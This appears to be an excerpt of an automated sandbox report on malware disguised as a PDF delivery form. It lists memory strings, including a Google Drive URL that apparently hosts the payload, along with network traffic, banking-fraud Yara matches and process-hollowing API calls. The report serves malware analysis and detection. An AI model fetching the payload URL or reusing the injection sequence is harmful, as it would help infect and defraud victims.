                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020C1D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020BF9000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020BD9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=downloade6
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=downlo
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe PID: 6620, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE8254 NtReadVirtualMemory,0_2_02CE8254
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE84C4 NtUnmapViewOfSection,0_2_02CE84C4
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_02CEDACC
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02CEDA44
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02CE8BB0
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02CEDBB0
